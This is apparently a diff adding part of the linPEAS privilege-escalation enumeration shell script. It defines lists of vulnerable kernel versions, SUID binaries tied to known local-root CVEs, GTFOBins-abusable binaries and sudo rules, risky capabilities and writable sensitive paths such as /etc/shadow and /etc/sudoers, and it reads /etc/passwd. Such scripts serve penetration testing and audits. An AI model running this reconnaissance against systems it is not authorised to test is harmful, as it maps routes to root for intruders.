+kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6"
+kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6"
+kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7"
+
+
+MyUID=$(id -u $(whoami))
+if [ "$MyUID" ]; then myuid=$MyUID; elif [ $(id -u $(whoami) 2>/dev/null) ]; then myuid=$(id -u $(whoami) 2>/dev/null); elif [ "$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1)" ]; then myuid=$(id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1); fi
+if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi
+idB="euid|egid$baduid"
+sudovB="[01].[012345678].[0-9]+|1.9.[01234]|1.9.5p1"
+
+mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut -d " " -f5 | grep "^/" | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}')
+if ! [ "$mounted" ]; then
+ mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}')
+fi
+if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty
+mountG="swap|/cdrom|/floppy|/dev/shm"
+notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee"
+mountpermsB="\Wsuid|\Wuser|\Wexec"
+mountpermsG="nosuid|nouser|noexec"
+
+rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService"
+
+groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)"
+groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)"
+knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html
+mygroups=$(groups 2>/dev/null | tr " " "|")
+
+# Default Binaries List
+sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent$|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$"
+sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/helper$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/load_osxfuse$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount$|/mount.cifs$|/mount.ecryptfs_private$|/mount.nfs$|/mount.nfs4$|/mount_osxfuse$|/mtr$|/mutt_dotlock$"
+sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$"
+sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$"
+
+#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
+sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
+ /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\
+ /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22
+ /chfn$%SuSE_9.3/10\
+ /chkey$%Solaris_2.5.1\
+ /chkperm$%Solaris_7.0_\
+ /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\
+ /chpasswd$%SquirrelMail\(2004-04\)\
+ /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\
+ /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\
+ /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\
+ /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\
+ /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\
+ /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\
+ /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\
+ /keybase-redirector%CentOS_Linux_release_7.4.1708\
+ /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\
+ /lpc$%S.u.S.E_Linux_5.2\
+ /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\
+ /mail.local$%NetBSD_7.0-7.0.1__6.1-6.1.5__6.0-6.0.6
+ /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\
+ /movemail$%Emacs\(08-1986\)\
+ /mrinfo$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
+ /mtrace$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\
+ /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\
+ /newgrp$%HP-UX_10.20\
+ /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\
+ /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\
+ /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)\
+ /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\
+ /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\
+ /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\
+ /rcp$%RedHat_6.2\
+ /rdist$%Solaris_10/OpenSolaris\
+ /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\
+ /screen$%GNU_Screen_4.5.0\
+ /sdtcm_convert$%Sun_Solaris_7.0\
+ /sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\
+ /snap-confine$%Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation\(CVE-2019-7304\)\
+ /sudo%check_if_the_sudo_version_is_vulnerable\
+ /Serv-U%FTP_Server<15.1.7(CVE-2019-12181)
+ /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\
+ /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\
+ /traceroute$%LBL_Traceroute_\[2000-11-15\]\
+ /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\
+ /umount$%BSD/Linux\(08-1996\)\
+ /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\
+ /uucp$%Taylor_UUCP_1.0.6\
+ /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\
+ /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\
+ /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\
+ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\
+ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)"
+#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
+sidVB='/ab$|/agetty$|/alpine$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/basez$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/choom$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/efax$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/fish$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genie$|/genisoimage$|/gimp$|/ginsh$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/kubectl$|/latex$|/ldconfig$|/less$|/lftp$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/mosquitto$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$'
+sidVB2='/msguniq$|/multitime$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pidstat$|/pr$|/pry$|/psftp$|/ptx$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmdb$|/rpmquery$|/rpmverify$|/rsync$|/run-parts$|/rview$|/rvim$|/sash$|/scanmem$|/scp$|/scrot$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tasksh$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/unzip$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xdotool$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/yash$|/zip$|/zsh$|/zsoelim$'
+cfuncs='file|free|main|more|read|split|write'
+
+sudoVB1=" \*|env_keep\W*\+=.*LD_PRELOAD|env_keep\W*\+=.*LD_LIBRARY_PATH|ab$|alpine$|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ascii-xfr$|ascii85$|ash$|aspell$|at$|atobm$|awk$|base32$|base58$|base64$|basenc$|basez$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|choom$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|efax$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|fish$|flock$|fmt$|fold$|fping$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genie$|genisoimage$|ghc$|ghci$|gimp$|ginsh$|git$|grc$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|ispell$|jjs$|join$|journalctl$|jq$|jrunscript$|jtag$|knife$|ksh$|ksshell$|kubectl$|latex$|latexmk$|ldconfig$|less$|lftp$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mosquitto$|mount$|msgattrib$"
+sudoVB2="msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|mtr$|multitime$|mv$|mysql$|nano$|nasm$|nawk$|nc$|neofetch$|nice$|nl$|nm$|nmap$|node$|nohup$|npm$|nroff$|nsenter$|octave$|od$|openssl$|openvpn$|openvt$|opkg$|paste$|pdb$|pdflatex$|pdftex$|perf$|perl$|pg$|php$|pic$|pico$|pidstat$|pip$|pkexec$|pkg$|pr$|pry$|psftp$|psql$|ptx$|puppet$|python$|rake$|readelf$|red$|redcarpet$|restic$|rev$|rlwrap$|rpm$|rpmdb$|rpmquery$|rpmverify$|rsync$|ruby$|run-mailcap$|run-parts$|rview$|rvim$|sash$|scanmem$|scp$|screen$|script$|scrot$|sed$|service$|setarch$|sftp$|sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|sort$|split$|sqlite3$|ss$|ssh-keygen$|ssh-keyscan$|ssh$|sshpass$|start-stop-daemon$|stdbuf$|strace$|strings$|su$|sysctl$|systemctl$|systemd-resolve$|tac$|tail$|tar$|task$|taskset$|tasksh$|tbl$|tclsh$|tcpdump$|tee$|telnet$|tex$|tftp$|tic$|time$|timedatectl$|timeout$|tmux$|top$|troff$|ul$|unexpand$|uniq$|unshare$|unzip$|update-alternatives$|uudecode$|uuencode$|valgrind$|vi$|view$|vigr$|vim$|vimdiff$|vipw$|virsh$|wall$|watch$|wc$|wget$|whiptail$|wireshark$|wish$|xargs$|xdotool$|xelatex$|xetex$|xmodmap$|xmore$|xpad$|xxd$|xz$|yarn$|yash$|yum$|zathura$|zip$|zsh$|zsoelim$|zypper$"
+sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|env_keep|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount"
+sudoG="NOEXEC"
+
+capsVB="cap_sys_admin:mount|python \
+cap_sys_ptrace:python \
+cap_sys_module:kmod|python \
+cap_dac_override:python|vim \
+cap_chown:chown|python \
+cap_former:chown|python \
+cap_setuid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \
+cap_setgid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \
+cap_net_raw:python|tcpdump"
+
+
+capsB="=ep|cap_chown|cap_former|cap_setfcap|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_kill|cap_net_bind_service|cap_net_raw|cap_net_admin|cap_sys_admin|cap_sys_ptrace|cap_sys_module"
+containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override|sys_rawio|syslog|net_raw|net_admin"
+
+OLDPATH=$PATH
+ADDPATH=":/usr/local/sbin\
+ :/usr/local/bin\
+ :/usr/sbin\
+ :/usr/bin\
+ :/sbin\
+ :/bin"
+spath=":$PATH"
+for P in $ADDPATH; do
+ if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi
+done
+
+# test if sed supports -E or -r
+E=E
+echo | sed -${E} 's/o/a/' 2>/dev/null
+if [ $? -ne 0 ] ; then
+ echo | sed -r 's/o/a/' 2>/dev/null
+ if [ $? -eq 0 ] ; then
+ E=r
+ else
+ echo "${YELLOW}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}"
+ fi
+fi
+
+writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$"
+writeVB="/etc/anacrontab|/etc/apt/apt.conf.d|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/cron/tabs/|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"$(echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g') #Add Path but remove simple dot in PATH
+
+if [ "$MACPEAS" ]; then
+ sh_usrs="ImPoSSssSiBlEee"
+ nosh_usrs="ImPoSSssSiBlEee"
+ dscl . list /Users | while read uname; do
+ ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
+ if grep -q \"$ushell\" /etc/shells; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi
+ done
+else
+ sh_usrs=$(cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/')"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere
+ nosh_usrs=$(cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/')"ImPoSSssSiBlEee"
+fi
+knw_usrs='_amavisd|_analyticsd|_appinstalld|_appleevents|_applepay|_appowner|_appserver|_appstore|_ard|_assetcache|_astris|_atsserver|_avbdeviced|_calendar|_captiveagent|_ces|_clamav|_cmiodalassistants|_coreaudiod|_coremediaiod|_coreml|_ctkd|_cvmsroot|_cvs|_cyrus|_datadetectors|_demod|_devdocs|_devicemgr|_diskimagesiod|_displaypolicyd|_distnote|_dovecot|_dovenull|_dpaudio|_driverkit|_eppc|_findmydevice|_fpsd|_ftp|_fud|_gamecontrollerd|_geod|_hidd|_iconservices|_installassistant|_installcoordinationd|_installer|_jabber|_kadmin_admin|_kadmin_changepw|_knowledgegraphd|_krb_anonymous|_krb_changepw|_krb_kadmin|_krb_kerberos|_krb_krbtgt|_krbfast|_krbtgt|_launchservicesd|_lda|_locationd|_logd|_lp|_mailman|_mbsetupuser|_mcxalr|_mdnsresponder|_mobileasset|_mysql|_nearbyd|_netbios|_netstatistics|_networkd|_nsurlsessiond|_nsurlstoraged|_oahd|_ondemand|_postfix|_postgres|_qtss|_reportmemoryexception|_rmd|_sandbox|_screensaver|_scsd|_securityagent|_softwareupdate|_spotlight|_sshd|_svn|_taskgated|_teamsserver|_timed|_timezone|_tokend|_trustd|_trustevaluationagent|_unknown|_update_sharing|_usbmuxd|_uucp|_warmd|_webauthserver|_windowserver|_www|_wwwproxy|_xserverdocs|daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+'
+USER=$(whoami 2>/dev/null || echo "UserUnknown")
+if [ ! "$HOME" ]; then
+ if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home
+ else HOME="/home/$USER";
+ fi
+fi
+Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|')
+
+#This variables are dived in several different ones because NetBSD required it
